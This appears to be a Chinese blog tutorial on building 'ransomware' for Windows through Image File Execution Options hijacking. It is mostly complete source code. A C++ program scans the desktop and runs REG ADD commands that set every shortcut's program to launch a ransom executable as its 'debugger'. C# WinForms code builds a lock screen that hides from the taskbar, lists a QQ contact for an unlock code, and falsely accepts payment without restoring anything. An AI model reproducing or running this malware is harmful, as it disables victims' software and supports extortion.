基于windows下的映像劫持实现“勒索病毒”


.

##什么是映像劫持?

关于映像劫持,我曾经在博客中给大家讲过,在此就不再阐述了。

##什么是勒索病毒?

勒索病毒,是一种新型电脑病毒,主要以邮件、程序木马、网页挂马的形式进行传播。该病毒性质恶劣、危害极大,一旦感染将给用户带来无法估量的损失。这种病毒利用各种加密算法对文件进行加密,被感染者一般无法解密,必须拿到解密的私钥才有可能破解。

而我们这里,仅仅只是利用映像劫持技术,来实现用户正常软件无法打开,从而实现勒索目的。


##C/C++实现映像劫持源代码


#include "shlobj.h" 
#include <iostream>
#include <string>
#include <list>
#include <vector>
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <io.h>
using namespace std;
class Hacker {
public:
Hacker()
{
Path = this->getDesktopPath();
GetAllgpxFilepathFromfolder(Path);
}
private:
string Path;
public:
list<string> FileName;
private:
string getDesktopPath() //获取桌面路径
{
LPITEMIDLIST pidl;
LPMALLOC pShellMalloc;
char szDir[200];
if (SUCCEEDED(SHGetMalloc(&pShellMalloc)))
{
if (SUCCEEDED(SHGetSpecialFolderLocation(NULL, CSIDL_DESKTOP, &pidl))) {
// 如果成功返回true
SHGetPathFromIDListA(pidl, szDir);
pShellMalloc->Free(pidl);
}
pShellMalloc->Release();
}

return string(szDir);
}

private:
int GetAllgpxFilepathFromfolder(string Path)
{
char szFind[MAX_PATH];
WIN32_FIND_DATA FindFileData;
strcpy(szFind, Path.c_str());
strcat(szFind, "\\*.*");
HANDLE hFind = FindFirstFile(szFind, &FindFileData);
if (INVALID_HANDLE_VALUE == hFind) return -1;
do
{
if (FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
if (strcmp(FindFileData.cFileName, ".") != 0 && strcmp(FindFileData.cFileName, "..") != 0)
{
//发现子目录,递归之
char szFile[MAX_PATH] = { 0 };
strcpy(szFile, Path.c_str());
strcat(szFile, "\\");
strcat(szFile, FindFileData.cFileName);
GetAllgpxFilepathFromfolder(szFile);
}
}else{
FileName.push_back(FindFileData.cFileName);
}
} while (FindNextFile(hFind, &FindFileData));
FindClose(hFind);
return 0;
}
};

void replaceA_to_B(std::string& S, const std::string A, const std::string B) {
std::size_t found = S.find(A);
while (std::string::npos != found) {
S.replace(found, A.length(), B);
found = S.find(A, found + 1);
}
}
int main()
{
Hacker* one = new Hacker();
string arr;
for (list<string>::iterator itor = one->FileName.begin(); itor != one->FileName.end(); itor++)
{
replaceA_to_B(*itor, ".lnk", ".exe");
int pos = 0;
pos =(*itor).find(".exe");
if (-1 != pos)
{
*itor = (*itor).substr(0, pos+4);
}
}
for (list<string>::iterator itor = one->FileName.begin(); itor != one->FileName.end(); itor++)
{
arr = "REG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\" + *itor + "\"" + " /v Debugger /t REG_SZ /d \"勒索病毒名称.exe\" /f";
system(arr.c_str());
}
system("pause");
return 0;
}


#基于c#实现勒索病毒:


#####Form1.Designer.cs:

namespace Extortion_virus
{
partial class Form1
{
/// <summary>
/// 必需的设计器变量。
/// </summary>
private System.ComponentModel.IContainer components = null;

/// <summary>
/// 清理所有正在使用的资源。
/// </summary>
/// <param name="disposing">如果应释放托管资源,为 true;否则为 false。</param>
protected override void Dispose(bool disposing)
{
if (disposing && (components != null))
{
components.Dispose();
}
base.Dispose(disposing);
}

#region Windows 窗体设计器生成的代码

/// <summary>
/// 设计器支持所需的方法 - 不要修改
/// 使用代码编辑器修改此方法的内容。
/// </summary>
private void InitializeComponent()
{
System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(Form1));
this.pictureBox1 = new System.Windows.Forms.PictureBox();
this.label1 = new System.Windows.Forms.Label();
this.label2 = new System.Windows.Forms.Label();
this.label3 = new System.Windows.Forms.Label();
this.label4 = new System.Windows.Forms.Label();
this.button1 = new System.Windows.Forms.Button();
this.backgroundWorker1 = new System.ComponentModel.BackgroundWorker();
((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).BeginInit();
this.SuspendLayout();
//
// pictureBox1
//
this.pictureBox1.BackColor = System.Drawing.Color.Yellow;
this.pictureBox1.Image = ((System.Drawing.Image)(resources.GetObject("pictureBox1.Image")));
this.pictureBox1.Location = new System.Drawing.Point(0, -1);
this.pictureBox1.Name = "pictureBox1";
this.pictureBox1.Size = new System.Drawing.Size(515, 302);
this.pictureBox1.TabIndex = 0;
this.pictureBox1.TabStop = false;
//
// label1
//
this.label1.AutoSize = true;
this.label1.BackColor = System.Drawing.Color.Turquoise;
this.label1.Font = new System.Drawing.Font("楷体", 21.75F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(134)));
this.label1.ForeColor = System.Drawing.Color.DarkOrange;
this.label1.Location = new System.Drawing.Point(125, 29);
this.label1.Name = "label1";
this.label1.Size = new System.Drawing.Size(253, 29);
this.label1.TabIndex = 1;
this.label1.Text = "Extortion virus";
//
// label2
//
this.label2.AutoSize = true;
this.label2.Font = new System.Drawing.Font("楷体", 12.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(134)));
this.label2.ForeColor = System.Drawing.Color.Chartreuse;
this.label2.Location = new System.Drawing.Point(52, 88);
this.label2.Name = "label2";
this.label2.Size = new System.Drawing.Size(422, 17);
this.label2.TabIndex = 2;
this.label2.Text = "Your computer is paralyzed and unable to work.";
//
// label3
//
this.label3.AutoSize = true;
this.label3.Font = new System.Drawing.Font("楷体", 13F);
this.label3.ForeColor = System.Drawing.Color.Chartreuse;
this.label3.Location = new System.Drawing.Point(52, 119);
this.label3.Name = "label3";
this.label3.Size = new System.Drawing.Size(422, 18);
this.label3.TabIndex = 3;
this.label3.Text = " If you need to continue to use your computer,";
//
// label4
//
this.label4.AutoSize = true;
this.label4.Font = new System.Drawing.Font("楷体", 12.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(134)));
this.label4.ForeColor = System.Drawing.Color.Chartreuse;
this.label4.Location = new System.Drawing.Point(152, 161);
this.label4.Name = "label4";
this.label4.Size = new System.Drawing.Size(188, 17);
this.label4.TabIndex = 4;
this.label4.Text = "please click unlock.";
//
// button1
//
this.button1.BackColor = System.Drawing.SystemColors.GradientActiveCaption;
this.button1.Font = new System.Drawing.Font("楷体", 25F);
this.button1.ForeColor = System.Drawing.Color.Crimson;
this.button1.Location = new System.Drawing.Point(150, 232);
this.button1.Name = "button1";
this.button1.Size = new System.Drawing.Size(190, 52);
this.button1.TabIndex = 5;
this.button1.Text = "Unlock";
this.button1.UseVisualStyleBackColor = false;
this.button1.Click += new System.EventHandler(this.button1_Click);
//
// Form1
//
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
this.ClientSize = new System.Drawing.Size(515, 296);
this.Controls.Add(this.button1);
this.Controls.Add(this.label4);
this.Controls.Add(this.label3);
this.Controls.Add(this.label2);
this.Controls.Add(this.label1);
this.Controls.Add(this.pictureBox1);
this.Name = "Form1";
this.Text = "Form1";
((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).EndInit();
this.ResumeLayout(false);
this.PerformLayout();

}

#endregion

private System.Windows.Forms.PictureBox pictureBox1;
private System.Windows.Forms.Label label1;
private System.Windows.Forms.Label label2;
private System.Windows.Forms.Label label3;
private System.Windows.Forms.Label label4;
private System.Windows.Forms.Button button1;
private System.ComponentModel.BackgroundWorker backgroundWorker1;
}
}

#####From1.cs:

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;

namespace Extortion_virus
{
public partial class Form1 : Form
{
public Form1()
{
InitializeComponent();
KeyPreview = true;
this.ShowInTaskbar = false;
ControlBox = false;
this.MaximizeBox = false;
this.MinimizeBox = false;
this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
this.Text = "Extortion virus";
this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.None;
FormBorderStyle = FormBorderStyle.FixedSingle;
pictureBox1.BackColor = Color.Transparent;
label1.BackColor = Color.Transparent;
label1.Parent = pictureBox1;

label2.BackColor = Color.Transparent;
label2.Parent = pictureBox1;

label3.BackColor = Color.Transparent;
label3.Parent = pictureBox1;

label4.BackColor = Color.Transparent;
label4.Parent = pictureBox1;

}
private void Form1_KeyDown(object sender, KeyEventArgs e)
{
if (e.Modifiers == Keys.Control && e.KeyCode == Keys.Delete && e.Modifiers ==Keys.Alt)
{
MessageBox.Show("You cannot open task manager now.");
}
if ((e.Modifiers == Keys.LWin || e.Modifiers == Keys.RWin) && e.Modifiers == Keys.R)
{
MessageBox.Show("You are prohibited from running the process now.");
}
if (e.Modifiers == Keys.RWin || e.Modifiers == Keys.LWin) {
MessageBox.Show("You are not allowed to do anything.");
}
if (e.Modifiers == Keys.Alt && e.Modifiers == Keys.F4)
{
MessageBox.Show("Sorry, I really don't want to see you do this.");
}
}
private void button1_Click(object sender, EventArgs e)
{
this.Hide();
Form2 f2 = new Form2();
f2.Show();
}
}
}

#####Form2.Designer.cs

namespace Extortion_virus
{
partial class Form2
{
/// <summary>
/// Required designer variable.
/// </summary>
private System.ComponentModel.IContainer components = null;

/// <summary>
/// Clean up any resources being used.
/// </summary>
/// <param name="disposing">true if managed resources should be disposed; otherwise, false.</param>
protected override void Dispose(bool disposing)
{
if (disposing && (components != null))
{
components.Dispose();
}
base.Dispose(disposing);
}

#region Windows Form Designer generated code

/// <summary>
/// Required method for Designer support - do not modify
/// the contents of this method with the code editor.
/// </summary>
private void InitializeComponent()
{
System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(Form2));
this.pictureBox1 = new System.Windows.Forms.PictureBox();
this.label1 = new System.Windows.Forms.Label();
this.label2 = new System.Windows.Forms.Label();
this.richTextBox1 = new System.Windows.Forms.RichTextBox();
this.label3 = new System.Windows.Forms.Label();
this.label4 = new System.Windows.Forms.Label();
this.label5 = new System.Windows.Forms.Label();
this.label6 = new System.Windows.Forms.Label();
this.label7 = new System.Windows.Forms.Label();
this.button1 = new System.Windows.Forms.Button();
this.button2 = new System.Windows.Forms.Button();
((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).BeginInit();
this.SuspendLayout();
//
// pictureBox1
//
this.pictureBox1.Image = ((System.Drawing.Image)(resources.GetObject("pictureBox1.Image")));
this.pictureBox1.Location = new System.Drawing.Point(1, 0);
this.pictureBox1.Name = "pictureBox1";
this.pictureBox1.Size = new System.Drawing.Size(536, 306);
this.pictureBox1.TabIndex = 0;
this.pictureBox1.TabStop = false;
//
// label1
//
this.label1.AutoSize = true;
this.label1.BackColor = System.Drawing.Color.WhiteSmoke;
this.label1.Font = new System.Drawing.Font("楷体", 15F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(134)));
this.label1.ForeColor = System.Drawing.SystemColors.MenuHighlight;
this.label1.Location = new System.Drawing.Point(72, 29);
this.label1.Name = "label1";
this.label1.Size = new System.Drawing.Size(427, 20);
this.label1.TabIndex = 1;
this.label1.Text = "Please input your poison serial number";
//
// label2
//
this.label2.AutoSize = true;
this.label2.BackColor = System.Drawing.SystemColors.GrayText;
this.label2.Font = new System.Drawing.Font("宋体", 15F, System.Drawing.FontStyle.Bold);
this.label2.ForeColor = System.Drawing.SystemColors.MenuHighlight;
this.label2.Location = new System.Drawing.Point(12, 70);
this.label2.Name = "label2";
this.label2.Size = new System.Drawing.Size(559, 20);
this.label2.TabIndex = 2;
this.label2.Text = "if not, please contact QQ: \"1152193204\" to get it.";
//
// richTextBox1
//
this.richTextBox1.Location = new System.Drawing.Point(169, 142);
this.richTextBox1.Name = "richTextBox1";
this.richTextBox1.Size = new System.Drawing.Size(282, 116);
this.richTextBox1.TabIndex = 3;
this.richTextBox1.Text = "";
//
// label3
//
this.label3.AutoSize = true;
this.label3.Font = new System.Drawing.Font("宋体", 15F, System.Drawing.FontStyle.Bold);
this.label3.ForeColor = System.Drawing.Color.Goldenrod;
this.label3.Location = new System.Drawing.Point(104, 142);
this.label3.Name = "label3";
this.label3.Size = new System.Drawing.Size(30, 20);
this.label3.TabIndex = 4;
this.label3.Text = "解";
//
// label4
//
this.label4.AutoSize = true;
this.label4.Font = new System.Drawing.Font("宋体", 15F, System.Drawing.FontStyle.Bold);
this.label4.ForeColor = System.Drawing.Color.Goldenrod;
this.label4.Location = new System.Drawing.Point(104, 171);
this.label4.Name = "label4";
this.label4.Size = new System.Drawing.Size(30, 20);
this.label4.TabIndex = 5;
this.label4.Text = "密";
//
// label5
//
this.label5.AutoSize = true;
this.label5.Font = new System.Drawing.Font("宋体", 15F, System.Drawing.FontStyle.Bold);
this.label5.ForeColor = System.Drawing.Color.Goldenrod;
this.label5.Location = new System.Drawing.Point(104, 198);
this.label5.Name = "label5";
this.label5.Size = new System.Drawing.Size(30, 20);
this.label5.TabIndex = 6;
this.label5.Text = "序";
//
// label6
//
this.label6.AutoSize = true;
this.label6.Font = new System.Drawing.Font("宋体", 15F, System.Drawing.FontStyle.Bold);
this.label6.ForeColor = System.Drawing.Color.Goldenrod;
this.label6.Location = new System.Drawing.Point(104, 226);
this.label6.Name = "label6";
this.label6.Size = new System.Drawing.Size(30, 20);
this.label6.TabIndex = 7;
this.label6.Text = "列";
//
// label7
//
this.label7.AutoSize = true;
this.label7.Font = new System.Drawing.Font("宋体", 15F, System.Drawing.FontStyle.Bold);
this.label7.ForeColor = System.Drawing.Color.Goldenrod;
this.label7.Location = new System.Drawing.Point(104, 254);
this.label7.Name = "label7";
this.label7.Size = new System.Drawing.Size(30, 20);
this.label7.TabIndex = 8;
this.label7.Text = "号";
//
// button1
//
this.button1.Font = new System.Drawing.Font("宋体", 10F);
this.button1.Location = new System.Drawing.Point(281, 264);
this.button1.Name = "button1";
this.button1.Size = new System.Drawing.Size(75, 23);
this.button1.TabIndex = 9;
this.button1.Text = "clear";
this.button1.UseVisualStyleBackColor = true;
this.button1.Click += new System.EventHandler(this.button1_Click);
//
// button2
//
this.button2.Font = new System.Drawing.Font("宋体", 10F);
this.button2.Location = new System.Drawing.Point(376, 264);
this.button2.Name = "button2";
this.button2.Size = new System.Drawing.Size(75, 23);
this.button2.TabIndex = 10;
this.button2.Text = "submit";
this.button2.UseVisualStyleBackColor = true;
this.button2.Click += new System.EventHandler(this.button2_Click);
//
// Form2
//
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
this.ClientSize = new System.Drawing.Size(537, 303);
this.Controls.Add(this.button2);
this.Controls.Add(this.button1);
this.Controls.Add(this.label7);
this.Controls.Add(this.label6);
this.Controls.Add(this.label5);
this.Controls.Add(this.label4);
this.Controls.Add(this.label3);
this.Controls.Add(this.richTextBox1);
this.Controls.Add(this.label2);
this.Controls.Add(this.label1);
this.Controls.Add(this.pictureBox1);
this.Name = "Form2";
this.Text = "Form2";
((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).EndInit();
this.ResumeLayout(false);
this.PerformLayout();

}

#endregion

private System.Windows.Forms.PictureBox pictureBox1;
private System.Windows.Forms.Label label1;
private System.Windows.Forms.Label label2;
private System.Windows.Forms.RichTextBox richTextBox1;
private System.Windows.Forms.Label label3;
private System.Windows.Forms.Label label4;
private System.Windows.Forms.Label label5;
private System.Windows.Forms.Label label6;
private System.Windows.Forms.Label label7;
private System.Windows.Forms.Button button1;
private System.Windows.Forms.Button button2;
}
}

#####From2.cs:

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;

namespace Extortion_virus
{
public partial class Form2 : Form
{
public Form2()
{
InitializeComponent();
this.ShowInTaskbar = false;
ControlBox = false;
this.MaximizeBox = false;
this.MinimizeBox = false;
this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
this.Text = "Extortion virus";
this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.None;
FormBorderStyle = FormBorderStyle.FixedSingle;
pictureBox1.BackColor = Color.Transparent;
label1.BackColor = Color.Transparent;
label1.Parent = pictureBox1;

label2.BackColor = Color.Transparent;
label2.Parent = pictureBox1;

label3.BackColor = Color.Transparent;
label3.Parent = pictureBox1;

label4.BackColor = Color.Transparent;
label4.Parent = pictureBox1;

label5.BackColor = Color.Transparent;
label5.Parent = pictureBox1;

label6.BackColor = Color.Transparent;
label6.Parent = pictureBox1;

label7.BackColor = Color.Transparent;
label7.Parent = pictureBox1;
}

private void button1_Click(object sender, EventArgs e)
{
richTextBox1.Clear();
}

private void button2_Click(object sender, EventArgs e)
{
if (richTextBox1.Text == "1152193204") {
MessageBox.Show("Thank you for buying our service, but your computer will not return to normal.");
}
else {
MessageBox.Show("Your serial number is wrong. Please try again.");
}
}
}
}

###代码执行后效果图

基于windows下的映像劫持实现“勒索病毒”_C/C++

###这里由于C#比C++开发快捷,故使用了C#的winfrom。在此我只设置了winfrom程序在任务栏隐藏,并不允许调整大小,删除关闭安全。检测用户按键。

###如果需要更好的效果,可以把两个程序合在一起,使用MFC或者QT来实现一个勒索病毒的效果。